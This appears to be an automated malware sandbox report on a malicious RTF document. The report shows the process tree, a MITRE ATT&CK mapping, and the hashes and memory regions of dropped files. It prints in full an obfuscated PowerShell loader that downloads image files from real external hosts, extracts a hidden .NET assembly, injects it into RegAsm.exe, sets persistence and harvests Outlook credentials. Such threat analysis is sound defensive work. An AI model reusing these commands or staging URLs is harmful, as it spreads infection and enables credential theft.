PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 1876 wrote to memory of 2116	1876	RegAsm.exe	40
PID 1876 wrote to memory of 2116	1876	RegAsm.exe	40
PID 1876 wrote to memory of 2116	1876	RegAsm.exe	40
PID 1876 wrote to memory of 2116	1876	RegAsm.exe	40
PID 1876 wrote to memory of 2116	1876	RegAsm.exe	40
PID 1876 wrote to memory of 2116	1876	RegAsm.exe	40
PID 1876 wrote to memory of 2116	1876	RegAsm.exe	40
PID 1876 wrote to memory of 2116	1876	RegAsm.exe	40
PID 1876 wrote to memory of 3000	1876	RegAsm.exe	41
PID 1876 wrote to memory of 3000	1876	RegAsm.exe	41
PID 1876 wrote to memory of 3000	1876	RegAsm.exe	41
PID 1876 wrote to memory of 3000	1876	RegAsm.exe	41
PID 1876 wrote to memory of 3000	1876	RegAsm.exe	41
PID 1876 wrote to memory of 3000	1876	RegAsm.exe	41
PID 1876 wrote to memory of 3000	1876	RegAsm.exe	41
PID 1876 wrote to memory of 3000	1876	RegAsm.exe	41
PID 1876 wrote to memory of 2196	1876	RegAsm.exe	42
PID 1876 wrote to memory of 2196	1876	RegAsm.exe	42
PID 1876 wrote to memory of 2196	1876	RegAsm.exe	42
PID 1876 wrote to memory of 2196	1876	RegAsm.exe	42
PID 1876 wrote to memory of 2196	1876	RegAsm.exe	42
PID 1876 wrote to memory of 2196	1876	RegAsm.exe	42
PID 1876 wrote to memory of 2196	1876	RegAsm.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030.rtf"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2784
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:752

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:3048
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\greatdaytokiislover.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$leitariga = 'ZgB1AG4AYwB0AGkAbwBuACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAB7ACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAbABpAG4AawBzACkAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgAEAAKAApADsAIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAIAA9ACAAJABsAGkAbgBrAHMAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAJABsAGkAbgBrAHMALgBMAGUAbgBnAHQAaAA7ACAAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBrACAAaQBuACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACkAIAB7ACAAdAByAHkAIAB7ACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAArAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGwAaQBuAGsAKQAgAH0AIABjAGEAdABjAGgAIAB7ACAAYwBvAG4AdABpAG4AdQBlACAAfQAgAH0AOwAgAHIAZQB0AHUAcgBuACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAB9ADsAIAAkAGwAaQBuAGsAcwAgAD0AIABAACgAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUAMwAvADcAMQAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAwADkAOQAwADgAMwAxADYAJwAsACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUAMwAvADcAMQA0AC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAwADkAOQAwADgAMwA1ADAAJwApADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAAkAGwAaQBuAGsAcwA7ACAAaQBmACAAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBQAFIATwBKAEUAVABPAEEAVQBUAE8ATQBBAEMAQQBPAC4AVgBCAC4ASABvAG0AZQAnACkAOwAgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AUwBTAEkASwAvAHIAbABrAC8AcABwAG0AYQB4AC8ANwAwADEALgAzADQAMgAuADUAOAAxAC4ANwA0ADEALwAvADoAcAB0AHQAaAAnACAALAAgACcAMQAnACAALAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAgACwAIAAnAEsASQBTAFMAJwAsACcAUgBlAGcAQQBzAG0AJwAsACcAJwApACkAfQAgAH0A';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $leitariga));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2868
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/753/713/original/new_image.jpg?1709908316', 'https://uploaddeimagens.com.br/images/004/753/714/original/new_image.jpg?1709908350'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SSIK/rlk/ppmax/701.342.581.741//:ptth' , '1' , 'C:\ProgramData\' , 'KISS','RegAsm',''))} }"
      4⤵
      Blocklisted process makes network request
      Adds Run key to start application
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2948
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\KISS.vbs
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1992
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1876
      - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\temlvwvkkoowfcwiwjggnbdb"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2116
      - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\dgadnpglywgbqikmnutaqnxskvs"
        6⤵
        Accesses Microsoft Outlook accounts
        
        PID:3000
      - C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\oafoohrfueyosogqwfgbbskbtckgwv"
        6⤵
        
        PID:2196

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e04b41d841b9caddb53f4e6e9340ebf3

SHA1
59fefd0f735f2f019934ec3d8f9e9ae13480e984

SHA256
3eb2faa071346a1c4cba22993d90a5ba530ae197e227b8e44fe888292112584d

SHA512
055cddc813520c4c1a671988a18ebbd7fabeaf837cd6fd232348f835a5d1a54cb6f2d2566ae5828ab6965dc25f31c9b5e1a15a10cf1cd6e7531a6c3c0f903535

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
a7be4d705fb91d709ca96fe0d4e8818f

SHA1
cbca322e6b7695224c05816fedbea7f1c8dc732a

SHA256
3e28cfa385806c50fc2494c6000ec522baa9536d5f62e65839bdf22b41713773

SHA512
9803fcf4f013eabd702de5cc6d601e2bc306b49d253c3f384ca3501fd94a63ced207cc47dfbe1aea65827febe4fa780e470d61bd086aa60d8c77ad10392db71f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar236D.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\temlvwvkkoowfcwiwjggnbdb

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
a4ffbd374b8d62085a5b092eea1fa31b

SHA1
209e7de00208ee975d49a745a7c4895eff4b47d1

SHA256
40aafadbb75f610e72d6fea6872a56f04b6c0cffc1e880f63bcf397e3e32ee0f

SHA512
0e37a05801eef10ca9c98260949ce40bfb21ae5a3b05a7d6a7e7628023cbd03ecd071762151d0fc319d9b3de8234dbc1096d298b8f078bd5883bf9422bdd4848

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\23M67FD3QQYHPKTFS9GG.temp

Filesize
7KB

MD5
bfad9661c0ce96fdf5519d8a47e70bd8

SHA1
70fc7cedc9e9b463c8403d396878d51b944862cb

SHA256
1f23ae4122884929505942c1120d7e63b34170971be1c48fda447007a862ef7f

SHA512
b2e89620fee0141a50ef35d0b436b24fbda9eeac3f370891db41ae7fd3178da52cfb65e4488b21802449360c0082681f3a0f2690d33397869a888c0b749f835f

Download Submit
C:\Users\Admin\AppData\Roaming\greatdaytokiislover.vbs

Filesize
33KB

MD5
da24a3f9677942db1e73b0ef5d2011a4

SHA1
0ee17d73b3e26fe1c8b6680b92c305a4d850685c

SHA256
98e179fe22de663f2f6127de1354c0d14609c43ca0e644f320310104585f90ce

SHA512
46549a6ee806cf7c48328e80b124928258bed5ad182618c25b4bcbf61173ace8eb502f28ce5bf4dd9ba862d988a1c3a95ec86c9ce539fab6c30318c525138615

Download Submit
memory/1876-159-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-165-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-211-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-212-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-213-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-232-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-233-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-208-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-234-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-174-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-176-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-172-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-171-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-170-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-167-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-179-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-148-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-150-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-152-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-153-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-155-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-175-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-157-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-161-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-163-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1876-209-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1876-177-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1992-143-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/1992-144-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/1992-142-0x00000000028E0000-0x0000000002920000-memory.dmp

Filesize
256KB

Download
memory/1992-141-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/1992-138-0x00000000028E0000-0x0000000002920000-memory.dmp

Filesize
256KB

Download
memory/1992-180-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/2116-198-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2116-207-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2116-195-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2116-190-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2116-187-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2116-183-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2784-231-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2784-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2784-130-0x00000000717FD000-0x0000000071808000-memory.dmp

Filesize
44KB

Download
memory/2784-2-0x00000000717FD000-0x0000000071808000-memory.dmp

Filesize
44KB

Download
memory/2784-0-0x000000002F191000-0x000000002F192000-memory.dmp

Filesize
4KB

Download
memory/2868-131-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/2868-15-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/2868-137-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/2868-173-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/2868-17-0x0000000002BF0000-0x0000000002C30000-memory.dmp

Filesize
256KB

Download
memory/2868-16-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/2868-22-0x0000000002BF0000-0x0000000002C30000-memory.dmp

Filesize
256KB

Download
memory/2948-168-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/2948-145-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/2948-29-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/2948-28-0x000000006B810000-0x000000006BDBB000-memory.dmp

Filesize
5.7MB

Download
memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3000-199-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3000-193-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3000-189-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download